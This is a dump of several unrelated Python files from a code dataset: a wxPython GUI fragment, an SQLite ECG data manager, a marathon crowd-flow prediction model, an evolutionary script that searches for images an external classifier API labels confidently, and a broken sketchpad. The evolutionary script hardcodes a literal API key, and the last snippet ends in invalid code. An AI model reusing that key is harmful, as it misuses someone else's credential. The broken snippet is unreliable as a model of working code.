传统随机森林测试集平均相对误差:{}\n 改进随机森林测试集平均相对误差:{}\n ---------------------------\n 决策树深度:{}\n 训练集和测试集之比:7:3\n 单颗树划分属性标准:方差\n 叶子节点处理方式:取平均值\n \"\"\".format(end - start, min_ave_trarss, min_ave_optrss,\n everytra, everyopt, tree_depth)\n\n p2 = wx.Panel(self.frame2)\n\n Box_ms = wx.BoxSizer(wx.VERTICAL)\n\n tc1 = wx.StaticText(p2, label='建模结果:')\n Box_ms.Add(tc1, 0, wx.TOP | wx.LEFT, border=5)\n font = wx.Font(11, wx.DECORATIVE, wx.NORMAL, wx.NORMAL)\n tc1.SetFont(font)\n\n tc2 = wx.TextCtrl(p2, value=self.str_corr, style=(wx.TE_MULTILINE | wx.TE_DONTWRAP | wx.TE_READONLY),\n size=(800, 200))\n Box_ms.Add(tc2, 0)\n font = wx.Font(11, wx.DECORATIVE, wx.NORMAL, wx.NORMAL)\n tc2.SetFont(font)\n\n figure = Figure()\n axes = figure.add_subplot(111)\n canvas = FigureCanvas(p2, -1, figure)\n Box_ms.Add(canvas, 1, wx.LEFT | wx.TOP | wx.GROW)\n p2.Fit()\n\n x = []\n for i in range(tree_min, tree_max + 1, tree_spa):\n x.append(i)\n\n axes.plot(x, y1, label='tra')\n axes.plot(x, y2, color='red', label='opt')\n\n p2.SetSizer(Box_ms)\n\n self.frame2.Show()\n self.frame2.Centre()\n\n\n def on_list2_fmet(self,event):\n self.listbox2 = event.GetEventObject()\n\n def btn1top_fmet(self, event):\n self.val_top1.Destroy()\n f1 = self.listbox2.GetSelections()\n self.sel1 = []\n global label\n # print(label)\n for i in f1:\n self.sel1.append(label[i])\n # print(self.sel1)\n self.val_top = wx.ListBox(self.pfmet, -1, choices=self.sel1, style=wx.LB_EXTENDED, pos=(220, 70), size=(100, 140))\n\n def btn2top_fmet(self, event):\n self.val_bottom1.Destroy()\n f1 = self.listbox2.GetSelections()\n self.sel2 = []\n global label\n # print(label)\n for i in f1:\n self.sel2.append(label[i])\n # print(self.sel2)\n self.val_bottom = 
wx.ListBox(self.pfmet, -1, choices=self.sel2, style=wx.LB_EXTENDED, pos=(220, 230),\n size=(100, 140))\n\n\nclass AboutDialog(wx.Dialog):\n\n def __init__(self):\n wx.Dialog.__init__(self, parent=None, id=200, title='计算提升度',size=(500,500))\n global label\n Label = list(map(str,label))\n\n self.val_all = wx.ListBox(self, -1, choices = Label,style=wx.LB_EXTENDED ,pos =(100,50), size =(100,300)) # wx.LB_EXTENDED | wx.LB_SORT多选并且排序\n self.Bind(wx.EVT_LISTBOX, self.on_list2, self.val_all)\n\n self.val_top1 = wx.ListBox(self,-1, pos=(260, 50),size = (100,140))\n\n self.val_bottom1 = wx.ListBox(self, -1,pos=(260, 210),size = (100,140))\n\n btn1 = wx.Button(self, label='->', pos=(210, 100), size=(30, 30))\n btn1.Bind(wx.EVT_BUTTON,self.btn1top)\n\n btn2 = wx.Button(self, label='->', pos=(210, 260), size=(30, 30))\n btn2.Bind(wx.EVT_BUTTON, self.btn2top)\n\n btn3 = wx.Button(self, label='开始计算', pos=(180, 370), size=(100,35))\n btn3.Bind(wx.EVT_BUTTON, self.btn3rec)\n\n#获取参数值\n def Getvalue1(self):\n return self.val1.GetValue()\n\n def Getvalue2(self):\n return self.val2.GetValue()\n#打印参数\n def OnClick(self,event):\n\n print('参数1:',self.val1.GetValue())\n print('参数2:',self.val2.GetValue())\n\n def on_list2(self,event):\n self.listbox2 = event.GetEventObject()\n print(self.listbox2)\n #print(type(listbox2.GetSelections()))\n print('listbox2:' + str(self.listbox2.GetSelections()))\n\n def btn1top(self,event):\n self.val_top1.Destroy()\n f1 = self.listbox2.GetSelections()\n self.sel1 = []\n global label\n #print(label)\n for i in f1:\n self.sel1.append(label[i])\n print(self.sel1)\n self.val_top = wx.ListBox(self,-1,choices = self.sel1 ,style=wx.LB_EXTENDED, pos=(260, 50), size=(100, 140))\n\n def btn2top(self,event):\n self.val_bottom1.Destroy()\n f1 = self.listbox2.GetSelections()\n self.sel2 = []\n global label\n #print(label)\n for i in f1:\n self.sel2.append(label[i])\n print(self.sel2)\n self.val_bottom = wx.ListBox(self,-1,choices = self.sel2 ,style=wx.LB_EXTENDED, pos=(260, 210),size = (100,140))\n\n def btn3rec(self,event):\n print('自变量:'+str(self.sel1))\n print('因变量:'+str(self.sel2))\n\n\n\nif __name__ == '__main__':\n app = wx.App(0)\n frame = TestFrame()\n frame.InitUI()\n app.MainLoop()","sub_path":"GUI/UI.py","file_name":"UI.py","file_ext":"py","file_size_in_byte":23229,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"253438118","text":"import sqlite3 as sql3\n\n\ndef upload(time, ecg, pvcs):\n conn = sql3.connect('hmdata.db')\n c = conn.cursor()\n\n c.execute(\"DROP TABLE IF EXISTS ecg_data\")\n c.execute(\"CREATE TABLE ecg_data (IND INTEGER, TIME REAL, ECG REAL)\")\n\n c.execute(\"DROP TABLE IF EXISTS metadata\")\n c.execute(\"CREATE TABLE metadata (LENGTH INTEGER)\")\n c.execute(\"INSERT INTO metadata (LENGTH) VALUES(?)\", [len(ecg)])\n\n c.execute(\"DROP TABLE IF EXISTS pvc_data\")\n c.execute(\"CREATE TABLE pvc_data (IND INTEGER, CERTAINTY INTEGER)\")\n\n for i, (t, e) in enumerate(zip(time, ecg)):\n c.execute(\n \"INSERT INTO ecg_data (IND, TIME, ECG) VALUES(?, ?, ?)\",\n (i, float(t), float(e))\n )\n\n for (ind, certainty) in pvcs:\n c.execute(\n \"INSERT INTO pvc_data (IND, CERTAINTY) VALUES(?, ?)\",\n (int(ind), int(certainty))\n )\n\n conn.commit()\n conn.close()\n\n\ndef query_length():\n conn = sql3.connect('hmdata.db')\n c = conn.cursor()\n result = c.execute(\"SELECT LENGTH FROM metadata\").fetchone()[0]\n c.close()\n return result\n\n\ndef query_pvcs():\n conn = sql3.connect('hmdata.db')\n c = conn.cursor()\n result = 
c.execute(\"SELECT IND, CERTAINTY FROM pvc_data\").fetchall()\n c.close()\n return [[i, c] for (i, c) in result]\n\n\ndef query_data(start, end):\n conn = sql3.connect('hmdata.db')\n c = conn.cursor()\n result = c.execute(\"\"\"\n SELECT TIME, ECG FROM ecg_data\n WHERE TIME >= ? and TIME < ?\n ORDER BY TIME\n \"\"\", [start, end]).fetchall()\n time, ecg = zip(*result)\n c.close()\n return time, [float(s) for s in ecg]\n\n\ndef query_point(point):\n conn = sql3.connect('hmdata.db')\n c = conn.cursor()\n time, ecg = c.execute(\"\"\"\n SELECT TIME, ECG FROM ecg_data\n WHERE IND = ?\n ORDER BY TIME\n \"\"\", [int(point)]).fetchone()\n c.close()\n result = (time, float(ecg))\n return result\n","sub_path":"database_manager.py","file_name":"database_manager.py","file_ext":"py","file_size_in_byte":1988,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"603902113","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sep. 29, 2020\n建立馬拉松賽事跑者人流分析與預測模型\nRaw data: 田中馬拉松(2017年、2018年、2019年),全馬組跑者成績紀錄\nFeature: 跑速、感應點距離(離起跑點)、馬拉松舒適指數(環境因子、體感因子等9項)、\n 預測成績(起跑後通過某個感應點時間(秒), delta_time)(輸入特徵值進行正規化處理)\nOutput: 預測人數\n@author: Wen-Hsin Yang\n\"\"\"\n\nimport os\nimport math\nimport joblib #pkl模型 format\nimport pandas as pd\nimport seaborn as sns\nimport xgboost as xgb\nimport matplotlib.pyplot as plt\nfrom sklearn.preprocessing import MinMaxScaler\nfrom sklearn.ensemble import RandomForestRegressor\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.metrics import mean_squared_error\n#from mpl_toolkits.mplot3d import Axes3D\n\n# Register converters to avoid warnings\npd.plotting.register_matplotlib_converters()\nplt.rc(\"figure\", figsize=(16,12))\nplt.rc(\"font\", size=16)\nplt.rcParams['axes.unicode_minus'] = False # 修復負號顯示問題(正黑體)\n\n#####################\n# declare functions #\n#####################\n##\n# remove leading and trailing characters of each value across all cells in dataframe\ndef trim_all_cells(df):\n # trim whitespace from ends of each value across all series in dataframe\n trim_strings = lambda x: x.strip() if isinstance(x, str) else x\n return df.applymap(trim_strings)\n\ndef heatmap(x, y, size, corr):\n ###\n # heatmap 1: demonstrate the correlation of each two features in terms of the size of correlated ratio (position/negative)\n ##\n fig, ax = plt.subplots(figsize=(16,12))\n # Mapping from column names to integer coordinates\n x_labels = [v for v in sorted(x.unique())]\n y_labels = [v for v in sorted(y.unique())]\n\n x_to_num = {p[1]:p[0] for p in enumerate(x_labels)}\n y_to_num = {p[1]:p[0] for p in enumerate(y_labels)}\n \n #sns.set(font=['sans-serif'])\n size_scale = 300\n ax.scatter(\n x=x.map(x_to_num), # Use mapping for x\n y=y.map(y_to_num), # Use mapping for y\n s=size * size_scale, # Vector of square sizes, proportional to size parameter\n marker='s' # Use square as scatterplot marker\n )\n \n # Show column labels on the axes\n ax.set_xticks([x_to_num[v] for v in x_labels])\n ax.set_xticklabels(x_labels, rotation=45, horizontalalignment='right')\n ax.set_yticks([y_to_num[v] for v in y_labels])\n ax.set_yticklabels(y_labels)\n ax.grid(True, 'minor')\n ax.set_xticks([t + 0.5 for t in ax.get_xticks()], minor=True)\n ax.set_yticks([t + 0.5 for t in ax.get_yticks()], minor=True)\n ax.set_xlim([-0.5, max([v for v in x_to_num.values()]) + 0.5]) \n ax.set_ylim([-0.5, max([v for v in y_to_num.values()]) + 0.5])\n ax.set_title('跑拉松跑者人流分析預測(Feature Correlation)')\n ax.set_xlabel('特徵')\n ax.set_ylabel('特徵')\n plt.show() # 
display the graph\n # save figure to the file\n figfile = os.path.join(figpath, 'Feature Correlation_1.jpg')\n fig.savefig(figfile) # save the graph into a file \n \n ###\n # heatmap 2: demonstrate the correlation of each two features in terms of the correlated ratio\n ##\n fig, ax1 = plt.subplots(figsize=(16,12))\n corr = corr.pivot('x', 'y', 'value')\n ax1 = sns.heatmap(corr, vmax=1, vmin=-1, cmap='coolwarm', center=0, robust=True,\n annot=True, annot_kws={'size':16}, fmt='.1f',\n linewidths=0.5, square=True)\n ax1.set_xticklabels(ax1.get_yticklabels(), rotation=45, fontsize=16)\n ax1.set_title('跑拉松跑者人流分析預測(Feature Correlation)')\n ax1.set_xlabel('特徵 feature')\n ax1.set_ylabel('特徵 feature')\n plt.show()\n # save figure to the file\n figfile = os.path.join(figpath, 'Feature Correlation_2.jpg')\n fig.savefig(figfile) # save the graph into a file \n \n################\n# main program #\n################\nif __name__ == '__main__':\n ###\n # initialize environment's configuration\n ##\n # home directory\n base_dir = os.path.dirname(__file__)\n # directory for training data\n datapath = os.path.join(base_dir, 'data')\n if not os.path.isdir(datapath):\n os.mkdir(datapath)\n # directory for storing the figurer that are run by the trained model\n figpath = os.path.join(base_dir, 'figure')\n if not os.path.isdir(figpath):\n os.mkdir(figpath)\n # directory for storing the trainned model\n savepath = os.path.join(base_dir, 'model')\n if not os.path.isdir(savepath):\n os.mkdir(savepath) \n \n ###\n # step 1: conduct data preprocessing\n ##\n # read into the dataset \n datafile = os.path.join(datapath, 'dataset.xlsx')\n df = pd.read_excel(datafile,\n usecols=['預測人數', '預測時間',\n '速度', '距離', '溫度', '濕度', '熱中暑危險係數',\n '空氣品質指標', '細懸浮微粒', '蒲福風級', '小時雨量', '比例'])\n trim_all_cells(df) # remove leading and tailing white space of string (content of cell in dataframe)\n df.dropna(inplace=True) # omit the row of data in which any NAN value is contained \n \n # normalized by using MinMax standarization for features (in the dataframe X)\n X = pd.DataFrame()\n sc1 = MinMaxScaler() # range 0~1\n \n # 跑步速度 (0~22 km/h)\n sc = MinMaxScaler(feature_range=(0, 22))\n x_speed1 = pd.DataFrame(sc.fit_transform(df[['速度']].astype(float)))\n x_speed = pd.DataFrame(sc1.fit_transform(x_speed1[:].astype(float)))\n x_speed.columns = ['速度']\n \n # 感應點位置(距離) (0~43,000 m)\n sc = MinMaxScaler(feature_range=(0, 43000))\n x_dist1 = pd.DataFrame(sc.fit_transform(df[['距離']].astype(float)))\n x_dist = pd.DataFrame(sc1.fit_transform(x_dist1[:].astype(float)))\n x_dist.columns = ['距離'] \n \n # 體感因子(溫度) (0~40 度C)\n sc = MinMaxScaler(feature_range=(0, 40))\n x_temp1 = pd.DataFrame(sc.fit_transform(df[['溫度']].astype(float)))\n x_temp = pd.DataFrame(sc1.fit_transform(x_temp1[:].astype(float)))\n x_temp.columns = ['溫度']\n \n # 體感因子(濕度)(0~100 %)\n sc = MinMaxScaler(feature_range=(0, 100))\n x_hum1 = pd.DataFrame(sc.fit_transform(df[['濕度']].astype(float)))\n x_hum = pd.DataFrame(sc1.fit_transform(x_hum1[:].astype(float)))\n x_hum.columns = ['濕度']\n \n # 體感因子(熱中暑危險係數 Heat Index)(0~100 度C)\n sc = MinMaxScaler(feature_range=(0, 100))\n x_hi1 = pd.DataFrame(sc.fit_transform(df[['熱中暑危險係數']].astype(float)))\n x_hi = pd.DataFrame(sc1.fit_transform(x_hi1[:].astype(float)))\n x_hi.columns = ['熱中暑危險係數']\n \n # 環境因子(空氣品質指標 AQI) (0~200)\n sc = MinMaxScaler(feature_range=(0, 200))\n x_aqi1 = pd.DataFrame(sc.fit_transform(df[['空氣品質指標']].astype(float)))\n x_aqi = pd.DataFrame(sc1.fit_transform(x_aqi1[:].astype(float)))\n x_aqi.columns = ['空氣品質指標']\n \n # 環境因子(細懸浮微粒 
PM2.5) (0~72)\n sc = MinMaxScaler(feature_range=(0, 72))\n x_pm1 = pd.DataFrame(sc.fit_transform(df[['細懸浮微粒']].astype(float)))\n x_pm = pd.DataFrame(sc1.fit_transform(x_pm1[:].astype(float)))\n x_pm.columns = ['細懸浮微粒']\n \n # 環境因子(蒲福風級) (0~5 級風)\n sc = MinMaxScaler(feature_range=(0, 5))\n x_wr1 = pd.DataFrame(sc.fit_transform(df[['蒲福風級']].astype(float)))\n x_wr = pd.DataFrame(sc1.fit_transform(x_wr1[:].astype(float)))\n x_wr.columns = ['蒲福風級']\n \n # 環境因子(小時雨量) (0~41 mm/h)\n sc = MinMaxScaler(feature_range=(0, 41))\n x_hr1 = pd.DataFrame(sc.fit_transform(df[['小時雨量']].astype(float)))\n x_hr = pd.DataFrame(sc1.fit_transform(x_hr1[:].astype(float)))\n x_hr.columns = ['小時雨量']\n\n # 感應點觀測時間(在某個感應點特定的時間,觀察之後每10分鐘持續1小時,通過感應的人數) (0~關門時間 sec.)\n sc = MinMaxScaler() #MinMaxScaler(feature_range=(0, 21600))\n x_score1 = pd.DataFrame(sc.fit_transform(df[['預測時間']].astype(float)))\n x_score = pd.DataFrame(sc1.fit_transform(x_score1[:].astype(float)))\n x_score.columns = ['預測時間']\n range_runscore = sc.data_max_ # keep the maximal value in the configuration\n \n # combine all features as the dataframe X\n X = pd.concat([x_speed, x_dist, x_temp, x_hum, x_hi, x_aqi, x_pm, x_wr, x_hr, x_score], axis=1)\n # assign columns' labels into the training dataset\n X.columns = ['速度', '距離', '溫度', '濕度', '熱中暑危險係數', \n '空氣品質指標', '細懸浮微粒', '蒲福風級', '小時雨量', '預測時間']\n\n # applying MinMax scheme to normalize the prediction factors (i.e., the runners' number w.r.t. running flow and runners' scores)\n y = pd.DataFrame()\n # forecasted number of runners in a flow\n sc = MinMaxScaler() \n y_flow1 = pd.DataFrame(sc.fit_transform(df[['預測人數']].astype(float)))\n y_flow = pd.DataFrame(sc1.fit_transform(y_flow1[:].astype(float)))\n y_flow.columns = ['預測人數']\n range_runflow = sc.data_max_ # keep the maximal number in the configuration \n # establish y by concatting flow_number and scores\n y = y_flow #pd.concat([y_flow, y_score], axis=1)\n \n y = sc.fit_transform(df[['比例']])\n \n num_runner = 3854 # 預測該場全馬賽事之參賽(或報名)人數, default=3,854\n \n # keep the normalization parameters of the features in the configuration file\n config_df = pd.DataFrame(\n {'鳴槍時間' : 21600, # 6 a.m.\n '速度' : 22, # range 0~22\n '距離' : 43000, # range 0~43,000\n '溫度' : 40, # range 0~40\n '濕度' : 100, # range 0~100\n '熱中暑危險係數' : 100, # range 0~100\n '空氣品質指標' : 200, # range 0~200\n '細懸浮微粒' : 72, # range 0~72\n '蒲福風級' : 5, # range 0~5\n '小時雨量' : 41, # range 0~41 mm/hr\n # instead of 預測時間, we rename to 觀測時間 on the specific Station due to fitting the usage scenario\n '預測時間' : range_runscore, # range 0~range_runsore sec. 
關門時間,\n '預測人數(最多)' : range_runflow, # maximal number of runners in the training data \n '全馬參賽(或報名)人數' : num_runner # 預測該場全馬賽事之參賽(或報名)人數\n })\n configfile = os.path.join(savepath, 'config.xlsx')\n config_df.to_excel(configfile, index=False, encoding='cp950')\n \n ###\n # step 2: split training and testing datasets\n ##\n X_train, X_test, y_train, y_test = train_test_split(X, y, test_size=0.25, random_state=42)\n \n ###\n # step 3: train a model (univariate random forest regression)\n ##\n print('----------------------- RandomForestRegressor')\n \n # generate random forest regression model\n rf_reg_flow = RandomForestRegressor()\n rf_reg_flow.fit(X_train, y_train.ravel()) \n \n # evaluate model (univariate random forest regression)\n y_flow_pred = rf_reg_flow.predict(X_test) \n mse = mean_squared_error(y_test, y_flow_pred) * num_runner\n rmse = math.sqrt(mse)\n print(\"MSE, RMSE: %f %f\" % (mse, rmse))\n print('score= {a}'.format(a=rf_reg_flow.score(X_test, y_test)))\n print('importance= {a}'.format(a=rf_reg_flow.feature_importances_))\n \n # visualize the prediction result: 觀測時間 vs 預測人數\n # input: '觀測時間' in X-axis\n # output: '預測人數' in Y-axis\n plt.rc(\"figure\", figsize=(16,10))\n plt.rc(\"font\", size=16)\n plt.rcParams['axes.unicode_minus'] = False # 修復負號顯示問題(正黑體)\n fig, ax = plt.subplots(figsize=(16, 12)) \n # real results in the testing data\n X1 = df.loc[X_test.index] # take back original dataframe values w.r.t X.test which have conducted normalization \n ax.scatter(X1['預測時間'], y_test * num_runner, c='blue', marker='s', alpha=0.6, label='田中馬_全馬組(2017~2019年)紀錄')\n #ax.scatter(X_test['預測時間'], y_test, c='blue', marker='s', alpha=0.6, label='田中馬_全馬組(2017~2019年)紀錄')\n # predicted results w.r.t. testing data\n ax.scatter(X1['預測時間'], y_flow_pred * num_runner, c='red', marker='x', label='預測模型(Random Forest Regression)')\n #ax.scatter(X_test['預測時間'], y_flow_pred, c='red', marker='x', label='預測模型(Random Forest Regression)')\n ax.set_xlabel('觀測時間 (單位:秒)', fontsize=16) \n ax.set_ylabel('人數 (單位:人)', fontsize=16) \n ax.legend()\n ax.grid(True)\n plt.show() # display the graph\n # save figure to the file\n figfile = os.path.join(figpath, '預估人流_RF.jpg')\n fig.savefig(figfile) # save the graph into a file \n\n ###\n # step 4: keep training model\n ## \n # save model using joblib package\n savefile = os.path.join(savepath, 'rf_reg_flow(joblib).pkl')\n joblib.dump(rf_reg_flow, savefile) \n '''\n #check saved model\n rf_reg_1_flow = joblib.load(savefile)\n print('** save model then checking for it (rf_reg_flow)')\n print(rf_reg_1_flow.predict(X_test) \n '''\n \n ###\n # step 5: observe the correlation between any two features\n ##\n columns = ['速度', '距離', '溫度', '濕度', '熱中暑危險係數', '空氣品質指標', \n '細懸浮微粒', '蒲福風級', '小時雨量', '預測時間', '預測人數', '比例'] \n corr = df[columns].corr()\n corr = pd.melt(corr.reset_index(), id_vars='index') # Unpivot the dataframe, so we can get pair of arrays for x and y\n corr.columns = ['x', 'y', 'value']\n heatmap(x=corr['x'], y=corr['y'], size=corr['value'].abs(), corr=corr)\n \n ##\n # evaluate XGBoost reg:squarederror\n ##\n print('----------------------- XGBRegressor')\n xgb_reg = xgb.XGBRegressor(objective = 'reg:squarederror',\n #learning_rate = 0.1,\n #max_depth = 30,\n #subsample = 0.5,\n #colsample_bytree = 0.5,\n #alpha = 0.1,\n n_estimators = 5000)\n xgb_reg.fit(X_train, y_train)\n y_flow_pred = xgb_reg.predict(X_test)\n mse = mean_squared_error(y_test, y_flow_pred) * num_runner\n rmse = math.sqrt(mse)\n print(\"MSE, RMSE: %f %f\" % (mse, rmse))\n \n # save model using joblib 
package\n savefile = os.path.join(savepath, 'xgboost_reg_flow(joblib).pkl')\n joblib.dump(xgb_reg, savefile)\n '''\n #check saved model\n xgb_reg_1_flow = joblib.load(savefile) \n print('** save model then checking for it (xgboost_reg_flow)')\n print(xgb_reg_1_flow.predict(X_test)*num_runner) \n '''\n \n #plt.rc(\"figure\", figsize=(16, 10))\n #plt.rc(\"font\", size=16)\n #plt.rcParams['axes.unicode_minus'] = False # 修復負號顯示問題(正黑體) \n \n xgb.plot_tree(xgb_reg, num_trees=12)\n xgb.plot_importance(xgb_reg)\n plt.show()\n \n # visualize the prediction result: 觀測時間 vs 預測人數\n # input: '觀測時間' in X-axis\n # output: '預測人數' in Y-axis\n plt.rc(\"figure\", figsize=(16,12))\n plt.rc(\"font\", size=16)\n plt.rcParams['axes.unicode_minus'] = False # 修復負號顯示問題(正黑體)\n fig, ax = plt.subplots(figsize=(16, 12)) \n # real results in the testing data\n X1 = df.loc[X_test.index] # take back original dataframe values w.r.t X.test which have conducted normalization \n ax.scatter(X1['預測時間'], y_test * num_runner, c='blue', marker='s', alpha=0.6, label='田中馬_全馬組(2017~2019年)紀錄')\n #ax.scatter(X_test['預測時間'], y_test, c='blue', marker='s', alpha=0.6, label='田中馬_全馬組(2017~2019年)紀錄')\n # predicted results w.r.t. testing data\n ax.scatter(X1['預測時間'], y_flow_pred * num_runner, c='red', marker='x', label='預測模型(XGBoost Regression)')\n #ax.scatter(X_test['預測時間'], y_flow_pred, c='red', marker='x', label='預測模型(XGBoost Regression)')\n ax.set_xlabel('觀測時間 (單位:秒)', fontsize=16) \n ax.set_ylabel('人數 (單位:人)', fontsize=16) \n ax.legend()\n ax.grid(True)\n plt.show() # display the graph\n # save figure to the file\n figfile = os.path.join(figpath, '預估人流_XGBoost.jpg')\n fig.savefig(figfile) # save the graph into a file \n\n###############\n# end of file #\n############### ","sub_path":"runflow_20200929.py","file_name":"runflow_20200929.py","file_ext":"py","file_size_in_byte":16672,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"81498079","text":"import requests\nimport os\nimport skimage\nimport random\nimport json\nimport webbrowser\nimport time\nimport itertools\nimport pandas as pd\nfrom PIL import Image, ImageDraw\n\nglobal population\nglobal api_calls\nglobal stop\nglobal MUTATION_RATE\nshape = ((16, 16), (48,16), (16,48), (48,48))\npopulation = []\napi_calls = 0\nstop = False\nMUTATION_RATE = 10\n\n\ndef contrast(color1, color2):\n return abs(color1[0] - color2[0]) + abs(color1[1] - color2[1]) + abs(color1[2] - color2[2])\n\n\ndef generateImage(foreground, background):\n # set image format\n img = Image.new('RGB', (64, 64), color='black')\n draw = ImageDraw.Draw(img)\n\n #background fill\n draw.rectangle(((0,0),(64,64)), background)\n #draw shape\n draw.polygon(shape, foreground)\n \n return {\"image\": img, \"confidence\": 0, \"background\": background, \"foreground\": foreground, \"class\": \"\", \"contrast\": contrast(foreground, background)}\n\n\n# eval fitness for each individual\ndef evalFitness():\n global api_calls\n global stop\n for individual in population:\n name = 'toEval.png'\n image = individual[\"image\"]\n image.save(name)\n payload= {'key': 'Engeibei1uok4xaecahChug6eihos0wo'}\n r = requests.post('https://phinau.de/trasi', data=payload, files={'image': open(name, 'rb')})\n api_calls += 1\n if api_calls >= 60:\n #print(individual[\"foreground\"])\n time.sleep(60)\n api_calls = 0\n try:\n individual[\"confidence\"] = r.json()[0][\"confidence\"]\n individual[\"class\"] = r.json()[0][\"class\"].encode('utf-8')\n except ValueError:\n print(\"Decoding JSON failed -> 
hit API rate :(\")\n            stop = True\n            break\n\n\n# create initial population\ndef initPopulation(count):\n    for i in range(count):\n        # generateImage() takes a foreground and a background colour, so the\n        # original zero-argument call raised a TypeError; seed the initial\n        # population with random colour pairs instead\n        foreground = (random.randint(0, 255), random.randint(0, 255), random.randint(0, 255))\n        background = (random.randint(0, 255), random.randint(0, 255), random.randint(0, 255))\n        population.append(generateImage(foreground, background))\n\n# create a population that sweeps complementary (high-contrast) colour pairs\ndef initConstrastPopulation():\n    seq = [ 28 * i for i in range(10)]\n    for (r, g, b) in itertools.product(seq, seq, seq):\n        population.append(generateImage( (r, g, b), (255 - r, 255 - g, 255 - b) ))\n\n# clamp a colour channel into the valid 0-255 RGB range\ndef clamp(channel):\n    return max(0, min(255, channel))\n\n# select best individuals from population\ndef selection(bestCount):\n    population.sort(key=lambda individual: individual[\"confidence\"], reverse=True)\n    del population[bestCount:]\n\n# crossover between individuals in the population\ndef crossover():\n    # cross the background/foreground colours of neighbouring individuals and\n    # generate new images from the recombined pairs\n    for j in range(len(population)-1):\n        background = population[0 + j][\"background\"]\n        foreground = population[1 + j][\"foreground\"]\n        img = Image.new('RGB', (64, 64), color='black')\n        draw = ImageDraw.Draw(img)\n        draw.rectangle(((0,0),(64,64)), background)\n        draw.polygon(shape, foreground)\n        population.append({\"image\": img, \"confidence\": 0, \"background\": background, \"foreground\": foreground, \"class\": \"\"})\n\n# mutate each individual in the population and delete old population\ndef mutate(confidence):\n    # randomly shift the colours of individuals below the confidence target;\n    # channels are clamped so PIL always receives valid RGB values\n    population_size = len(population)\n    for j in range(len(population)):\n        img = Image.new('RGB', (64, 64), color='black')\n        draw = ImageDraw.Draw(img)\n        background = population[j][\"background\"]\n        foreground = population[j][\"foreground\"]\n        if(population[j][\"confidence\"] < confidence):\n            background = (\n                clamp(background[0] + random.randint(-10, 10) * MUTATION_RATE),\n                clamp(background[1] + random.randint(-10, 10) * MUTATION_RATE),\n                clamp(background[2] + random.randint(-10, 10) * MUTATION_RATE))\n            foreground = (\n                clamp(foreground[0] + random.randint(-10, 10) * MUTATION_RATE),\n                clamp(foreground[1] + random.randint(-10, 10) * MUTATION_RATE),\n                clamp(foreground[2] + random.randint(-10, 10) * MUTATION_RATE))\n        draw.rectangle(((0,0),(64,64)), background)\n        draw.polygon(shape, foreground)\n        population.append({\"image\": img, \"confidence\": 0, \"background\": background, \"foreground\": foreground, \"class\": \"\"})\n    # delete old\n    del population[:population_size]\n\ndef printResults():\n    for individual in population:\n        print(\"confidence: \", individual[\"confidence\"], \" class: \", individual[\"class\"])\n    print(\"..\")\n\ndef getBestResult():\n    best = 0\n    for individual in population:\n        if(individual[\"confidence\"] > best):\n            best = individual[\"confidence\"]\n    return best\n\n# get the count of images that match the confidence\ndef getCountThatMatch(confidence):\n    count = 0\n    for individual in population:\n        if(individual[\"confidence\"] >= confidence):\n            count += 1\n    return count\n\n\n# init parameters\nINITIAL_POPULATION = 10 # EXPERIMENT\nSELECTED_COUNT = 5 # specification\nDESIRED_CONFIDENCE = 0.50 # specification\n\n# run evolutionary algorithm (init -> selection -> loop(crossover-> mutate -> selection) until confidence matches all images)\ndef runEvoAlgorithm():\n    initPopulation(INITIAL_POPULATION)\n    evalFitness()\n    selection(SELECTED_COUNT)\n    printResults()\n    while getCountThatMatch(DESIRED_CONFIDENCE) < SELECTED_COUNT and stop == False:\n        crossover()\n        mutate(DESIRED_CONFIDENCE)\n        evalFitness()\n        selection(SELECTED_COUNT)\n        if (stop == False):\n            printResults()\n\n# save generated images with desired confidence\ndef saveImages():\n    for i in 
range(len(population)):\n if(population[i][\"confidence\"] > DESIRED_CONFIDENCE):\n image = population[i][\"image\"]\n name = (str(shape) + ';' + str(population[i][\"confidence\"]) + ';' + str(population[i][\"background\"])\n + ';' + str(population[i][\"foreground\"]) + ';' + population[i][\"class\"]).encode('utf-8')\n image.save(name + \".png\")\n webbrowser.open(name + \".png\")\n\n\ndef saveResults():\n df = pd.DataFrame(population, columns=[\"class\", \"confidence\", \"background\", \"foreground\", \"contrast\"])\n print(df)\n df.to_csv(\"results_contrast_color.csv\")\n\nif __name__ == '__main__':\n initConstrastPopulation()\n evalFitness()\n saveResults()\n print(\"api calls: \", api_calls)\n \n","sub_path":"evo_algorithm/ea_contrast/evo_algorithm_contrast.py","file_name":"evo_algorithm_contrast.py","file_ext":"py","file_size_in_byte":6272,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"111511355","text":"#!/usr/bin/env python\n\n\n\"\"\"\nA sketchpad to use w/ jupyter\n\"\"\"\n\nimport os, sys, itertools\nimport numpy as np\nimport pandas as pd\nfrom itertools import product\n\n\ndef zipList(a,b, delim='-'):\n \"\"\"function to zip two lists by a delim\"\"\"\n if len(a) == len(b):\n return [delim.join([str(a[i]),str(b[i])]) for i in range(len(a))]\n else:\n sys.exit(\"zipList requires iterators of same length\")\n\n\n\nlPos = [7, 24, 35, 48, 64, 138, 150, 162, 177]\nlID = ['CC', 'GG','CC', 'GG','CC', 'GG','CC', 'GG', 'GG']\nrPos = [16, 66, 86, 87, 103, 136, 150, 167, 207]\nrID = ['CC', 'GG','CC', 'GG','CC', 'GG','CC', 'GG', 'GG']\n\n\nstart, end, oStart, oEnd = 114472, 114559, 114259, 114772\n\ntrueLeft = [l + oStart for l in lPos]\ntrueRight = [r + end for r in rPos]\n\n# left = zipList(trueLeft, lID)\n# right = zipList(trueRight, rID)\nleft = zipList(lPos, lID)\nright = zipList(rPos, rID)\n\n\n## convert to df\ncombinations = pd.DataFrame(list(product(left, right)), columns = ['left','right'])\nleftSide = combinations['left'].str.split('-', expand=True).rename(columns = {0 : 'left', 1 : 'lPAM'})\nrightSide = combinations['right'].str.split('-', expand=True).rename(columns = {0 : 'right', 1 : 'rPAM'})\n\ncombinations = leftSide.join(rightSide, how = 'outer')\ncombinations['left'] = pd.to_numeric(combinations['left'])\ncombinations['right'] = pd.to_numeric(combinations['right'])\n\ncombinations['left'] = np.where(combinations['lID' == 'CC', ])\n\n\n## 